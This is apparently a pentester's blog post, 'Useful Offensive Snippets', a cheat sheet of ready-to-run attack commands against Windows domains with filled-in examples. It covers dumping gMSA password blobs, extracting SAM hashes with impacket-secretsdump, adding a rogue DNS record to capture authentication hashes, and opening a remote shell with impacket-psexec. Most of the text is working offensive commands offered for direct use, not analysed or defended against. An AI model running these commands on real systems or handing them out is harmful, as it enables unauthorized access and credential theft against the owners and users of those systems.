Useful Offensive Snippets
2 min readJul 13, 2022
I will update this post regularly, I am starting with a few of my most commonly used snippets.
Windows
SMB Connect
smbclient -U <USER> //<HOST>/<SHARE>
Example
smbclient -U Diddy.Doodat //pwned.com/Backup
Add DNS record kerberos
Can be used to capture authentication hashes if you identify a service that will call a specific DNS record.
python3 dnstool.py -u '<DOMAIN>\<USER>' -p <PASSWORD> -r pwned.hacker.com -a add -t A -d <DOMAIN IP> <DNS IP>
Example
python3 dnstool.py -u 'hacked\diddy.doodat' -p OMGJonathanScott -r pwned.hacker.com -a add -t A -d 10.10.10.12 86.32.12.233
Dump gMSA password blobs
python3 gMSADumper.py -u '<USER>' -p '<PASSWORD>' -d <DOMAIN>
Example
python3 gMSADumper.py -u 'diddy.doodat' -p 'OMGJonathanScott' -d pwned.hacker.com
Mount SMB share to Linux Host
mount -t cifs //<HOST>/<SHARE> /tmp/mnt
Example
mount -t cifs //128.11.2.121/Pwned /tmp/mnt
Shell from Linux with Impacket (psexec)
impacket-psexec -k -no-pass <DOMAIN>/<USER>@<HOST>
Example
impacket-psexec -k -no-pass hacked.com/Administrator@dc.hacked.com
Dump SAM hashes on Linux
impacket-secretsdump -sam SAM -system SYSTEM local
Linux
Fix Clock Skew Error
Fix skew when trying to connect to exploit systems where the skew is too great.
sudo ntpdate <NTP SERVER IP>
Example
sudo ntpdate 10.11.1.211
Mount VHD
guestmount --add <IMAGE>.vhd --inspector --ro -v /tmp/vhd
Example
guestmount — add leaked.vhd — inspector — ro -v /tmp/vhd